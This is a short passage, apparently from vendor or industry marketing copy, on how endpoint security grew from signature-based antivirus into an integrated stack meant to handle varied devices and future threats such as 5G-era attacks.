Endpoint security has evolved considerably over the last several decades—from simple, signature-based antivirus software to a holistic strategy and technology stack designed to protect against known or unknown threats to endpoints. Today, endpoint security is necessary to prevent, contain, mitigate, and remediate external and internal threats, and to scale to meet the growing diversity of devices, whether on-premises or remote, employee or vendor. It also needs to be forward-looking so it can accommodate an evolving IT and threat environment and withstand new tests, such as the high-velocity attacks that could soon emerge as 5G becomes more widespread. Most importantly, your endpoint security technology stack should be built with solutions that communicate and collaborate with each other, as well as with your broader IT and IT security ecosystem.